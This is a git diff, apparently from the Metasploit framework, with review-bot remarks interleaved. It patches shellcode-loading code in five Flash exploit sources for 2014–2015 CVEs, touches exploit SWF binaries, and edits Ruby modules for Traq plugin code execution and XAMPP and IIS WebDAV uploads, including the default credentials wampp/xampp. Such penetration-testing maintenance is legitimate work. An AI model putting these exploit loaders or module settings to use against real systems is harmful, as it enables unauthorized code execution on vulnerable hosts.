diff --git a/data/exploits/CVE-2014-0556/msf.swf b/data/exploits/CVE-2014-0556/msf.swf index 24cfc1a53a..f6483bd087 100755 Binary files a/data/exploits/CVE-2014-0556/msf.swf and b/data/exploits/CVE-2014-0556/msf.swf differ diff --git a/data/exploits/CVE-2014-0569/msf.swf b/data/exploits/CVE-2014-0569/msf.swf index 90737fca36..a124c560f0 100755 Binary files a/data/exploits/CVE-2014-0569/msf.swf and b/data/exploits/CVE-2014-0569/msf.swf differ diff --git a/data/exploits/CVE-2014-8440/msf.swf b/data/exploits/CVE-2014-8440/msf.swf index 823490c7e7..c6e47d226d 100755 Binary files a/data/exploits/CVE-2014-8440/msf.swf and b/data/exploits/CVE-2014-8440/msf.swf differ diff --git a/data/exploits/CVE-2015-0313/msf.swf b/data/exploits/CVE-2015-0313/msf.swf index 68b0ad0e6b..f4d5e8f32d 100755 Binary files a/data/exploits/CVE-2015-0313/msf.swf and b/data/exploits/CVE-2015-0313/msf.swf differ diff --git a/data/exploits/CVE-2015-0359/msf.swf b/data/exploits/CVE-2015-0359/msf.swf index 4befa69648..e7244c61f2 100755 Binary files a/data/exploits/CVE-2015-0359/msf.swf and b/data/exploits/CVE-2015-0359/msf.swf differ diff --git a/external/source/exploits/CVE-2014-0556/Main.as b/external/source/exploits/CVE-2014-0556/Main.as index 99364ccd47..da6482075c 100755 --- a/external/source/exploits/CVE-2014-0556/Main.as +++ b/external/source/exploits/CVE-2014-0556/Main.as @@ -27,7 +27,10 @@ package public function Main() { var b64:Base64Decoder = new Base64Decoder() - b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) var payload:String = b64.toByteArray().toString() for (i = 0; i < bv.length; i++) { diff --git a/external/source/exploits/CVE-2014-0569/Main.as b/external/source/exploits/CVE-2014-0569/Main.as index 5a7003b256..4ac48e2cec 100755 --- a/external/source/exploits/CVE-2014-0569/Main.as 
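Review bot: The added `b64_payload.replace(pattern, "+")` step in `Main()` carries no comment saying why spaces are turned back into plus signs, so a later reader cannot tell a deliberate workaround from a bug. Presumably the `sh` parameter arrives URL-decoded, which turns the `+` of the base64 alphabet into a space; a comment such as `// '+' in the base64 text arrives as ' ' after URL decoding of the sh parameter; restore it before decoding` would record that. The same four lines are repeated in the hunks for CVE-2014-0569/Main.as, CVE-2014-8440/Msf.as, CVE-2015-0313/Main.as and CVE-2015-0359/Msf.as, so the comment belongs on each copy, or the step in one shared helper. As a point of style, `var pattern:RegExp = / /g;` ends in a semicolon while the other added lines do not. The constructor body continues outside the hunk.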
+++ b/external/source/exploits/CVE-2014-0569/Main.as @@ -32,9 +32,11 @@ package var i:uint = 0 var j:uint = 0 - b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) - payload = b64.toByteArray().toString(); - + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) + payload = b64.toByteArray().toString() for (i = 0; i < defrag.length; i++) { defrag[i] = new ByteArray() defrag[i].length = BYTE_ARRAY_SIZE diff --git a/external/source/exploits/CVE-2014-8440/Msf.as b/external/source/exploits/CVE-2014-8440/Msf.as index d62b3c4561..4497389619 100755 --- a/external/source/exploits/CVE-2014-8440/Msf.as +++ b/external/source/exploits/CVE-2014-8440/Msf.as @@ -42,8 +42,11 @@ package this.object_vector_length = 5770 * 2 this.byte_array_vector_length = 510 * 2 - b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) - payload = b64.toByteArray().toString(); + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) + payload = b64.toByteArray().toString() this.initialize_worker_and_ba() if (!this.trigger()) diff --git a/external/source/exploits/CVE-2015-0313/Main.as b/external/source/exploits/CVE-2015-0313/Main.as index 58ed3d2bb5..b25008234d 100755 --- a/external/source/exploits/CVE-2015-0313/Main.as +++ b/external/source/exploits/CVE-2015-0313/Main.as @@ -39,7 +39,10 @@ public class Main extends Sprite private function mainThread():void { - b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) payload = b64.toByteArray().toString() ba.length = 0x1000 
@@ -204,4 +207,4 @@ public class Main extends Sprite return addr + i } } -} \ No newline at end of file +} diff --git a/external/source/exploits/CVE-2015-0359/Msf.as b/external/source/exploits/CVE-2015-0359/Msf.as index 1bf0cd1947..3556b41542 100755 --- a/external/source/exploits/CVE-2015-0359/Msf.as +++ b/external/source/exploits/CVE-2015-0359/Msf.as @@ -43,7 +43,10 @@ package private function mainThread():void { - b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) payload = b64.toByteArray().toString() ba.length = 0x1000 ba.shareable = true diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index a8ee210f38..f9a57f7f49 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -47,7 +47,7 @@ module Exploit::Remote::HttpClient Rex::Proto::Http::Client::DefaultUserAgent ]), OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]), diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb index 932d09f4b3..7c972720cb 100644 --- a/modules/exploits/multi/http/traq_plugin_exec.rb +++ b/modules/exploits/multi/http/traq_plugin_exec.rb 
@@ -17,12 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits an arbitrary command execution vulnerability in Traq 2.0 to 2.3. It's in the admincp/common.php script. - This function is called in each script located into /admicp/ directory to - make sure the user has admin rights, but this is a broken authorization - schema due to the header() function doesn't stop the execution flow. This - can be exploited by malicious users to execute admin functionality resulting - for e.g. in execution of arbitrary PHP code leveraging of plugins.php - functionality. + This function is called in each script located in the /admicp/ directory to + make sure the user has admin rights. This is a broken authorization schema + because the header() function doesn't stop the execution flow. + This can be exploited by malicious users to execute admin functionality, + e.g. execution of arbitrary PHP code leveraging of plugins.php functionality. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index 5c3e8725b5..744519e2fd 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']), OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]), OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp']) + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp']) ], self.class) end diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index f77ed98532..820a193e55 100644 
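Review bot: The reworded description still spells the directory `/admicp/`, while the sentence before it names `admincp/common.php`. This is presumably a typo, and the line should read `located in the /admincp/ directory`. "This function" also has no antecedent, because the preceding sentence names a script rather than a function. The closing phrase `leveraging of plugins.php functionality` would read better as `by leveraging the plugins.php functionality`. The description string starts and ends outside the hunk.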
--- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote # The USERNAME and PASSWORD are registered again to make them more obvious they're # configurable. OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptString.new('PATH', [ true, "The path to attempt to upload", '/metasploit%RAND%.asp']) ], self.class) end